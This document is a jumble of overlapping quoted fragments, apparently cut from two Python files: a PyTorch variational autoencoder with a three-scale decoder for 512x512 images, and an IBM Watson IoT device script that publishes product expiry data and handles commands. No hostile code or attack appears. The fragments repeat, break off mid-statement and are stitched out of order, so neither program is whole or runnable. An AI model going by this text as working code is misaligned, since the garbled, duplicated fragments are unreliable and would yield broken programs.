nn.BatchNorm2d(nef * 16),", ") self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64)", "nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps =", "64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1,", "nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), #", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16)", "16 x 16 nn.Conv2d(nef * 16, nef * 32, 4, 2, 1, bias=False),", "4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf", "bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1,", ") self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x =", "self.decode1(x) return out128, out256, out512 \"\"\" VAE with three losses at three scales", "(nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False),", "# state size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf *", "__init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( #", "= self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 =", "ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size", "64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32,", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4", "# state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8,", "x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 =", "nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar)", "#nn.Sigmoid() # for VAE # state size. (nc) x 512 x 512 )", "state size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef * 128,", "x 16 x 16 nn.Conv2d(nef * 16, nef * 32, 4, 2, 1,", "logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def", "2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2", "self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x", "16 nn.Conv2d(nef * 16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False))", "# state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4,", "nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1,", "nn.ReLU(True), # state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2,", "x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z", "= torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0]", "3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2,", "ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256", "def forward(self, input): x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x", "# state size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef *", "torch.nn as nn from torch.autograd import Variable from Param import nc, nz, device", "128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part", "##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2,", "size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self,", "128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1,", "* 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64 x 64 nn.Conv2d(nef", "nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf", "## self.encode = nn.Sequential( # input is (nc) x 512 x 512 nn.Conv2d(nc,", "nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2),", ") ## ##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128", "128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64,", "16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size.", "= self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\"", "nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128),", "nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), #", "scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc", "Encoder Part ## self.encode = nn.Sequential( # input is (nc) x 512 x", "= self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x", "def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps)", "def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential(", "x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self,", "reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return", "* 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder", "256 nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2,", "4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True),", "1, 1) #fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x =", "nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_()", "1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16", "= nn.Linear(64, nz) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device)", "bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128 x", "x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64)", "4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4)", "* 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64", "* 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2,", "nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4,", "self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x =", "256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE #", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4,", "x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() #", "eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size =", "#fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz,", "x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0,", "## Encoder Part ## self.encode = nn.Sequential( # input is (nc) x 512", "bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x 256", "1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x", "(nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz,", "* 16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16,", "self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input is", "nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf", "# state size is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2,", "x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "inplace=True), # state size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef", "nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc,", "1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x 64 x", "losses at three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512,", "the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder", "nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16", "1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64", "8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size.", "self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with three losses", "x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512", "size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1,", "nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), #", "x 4 x 4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0,", "logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1,", "2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x", "inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## #####", "16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16)", "nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size.", "64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef *", "* 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2,", "2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x", "nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4,", "nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf", "of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ##", "(ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4,", "__init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( #", "= self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1)", "ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 =", "nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef)", "import Variable from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512,", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16,", "1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2,", "4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz,", "nn from torch.autograd import Variable from Param import nc, nz, device class Model512(nn.Module):", "1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 =", "2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x 128", "torch import torch.nn as nn from torch.autograd import Variable from Param import nc,", "= self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z =", "is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef),", "# state size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef *", "* 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state", "ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size", "Variable from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__()", "2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x 16", "nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x 32", "x 64 x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1,", "64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size.", "size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1,", "nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x", "nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "8 x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False),", "1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4,", "512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x =", "= logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input):", "(ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid()", "x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE", "x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64 x 64", "x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2,", "is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1,", "x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True),", "mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z", "nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf *", "as nn from torch.autograd import Variable from Param import nc, nz, device class", "x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512", "self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def", "nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ##", "64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc)", "state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2,", "2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x", "nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x 512 x 512", "nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder", "bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x", "nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf,", "* 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid()", "* 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state", "for VAE # state size. (nc) x 512 x 512 ) self.output_layer =", "1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x" ]
[ "connecting device: %s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\"", "\"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting", "value \"world\" into the cloud as an event of type \"greeting\" 10 times", "RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command", "cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not", "'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in", "on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback #", "print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff':", "def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data,", "%s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT", "times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\"", "elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval'", "Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\"", "(\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if", "EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command ==", "= \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" %", "the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT", "if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\")", "received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT", "with value \"world\" into the cloud as an event of type \"greeting\" 10", "authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device:", "% str(e)) sys.exit() # Connect and send a datapoint \"hello\" with value \"world\"", "device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED", "exception connecting device: %s\" % str(e)) sys.exit() # Connect and send a datapoint", "data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\",", "not in cmd.data: print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message'])", "\"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command'])", "missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType,", "\"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received:", "= cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error -", "cmd.data: print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions", "= 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def", "if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is", "not in cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval", "% cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED", "print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\":", "deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli", "deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data", "cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval = cmd.data['interval']", "data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to", "products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids,", "deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" #", "myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0,", "# Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if", "- command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\":", "Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod =", "print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command", "== \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing required", "deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e:", "\"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except", "== \"print\": if 'message' not in cmd.data: print(\"Error - command is missing required", "- command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command", "missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if", "an event of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\"", "else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data:", "device: %s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\" with", "print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions =", "\"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as", "#Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId", "'interval' not in cmd.data: print(\"Error - command is missing required information: 'interval'\") else:", "to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from", "command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command ==", "Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect", "IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error -", "except Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() #", "required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message'", "authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd):", "\"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def", "Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod", "IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the", "Connect and send a datapoint \"hello\" with value \"world\" into the cloud as", "Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not", "\"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught", "\"world\" into the cloud as an event of type \"greeting\" 10 times deviceCli.connect()", "Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected", "IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not", "if 'message' not in cmd.data: print(\"Error - command is missing required information: 'message'\")", "#print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\",", "= {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM", "a datapoint \"hello\" with value \"world\" into the cloud as an event of", "information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not", "information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId,", "success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device", "in cmd.data: print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message']) try:", "cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing", "json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\"", "datapoint \"hello\" with value \"world\" into the cloud as an event of type", "EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error", "'message' not in cmd.data: print(\"Error - command is missing required 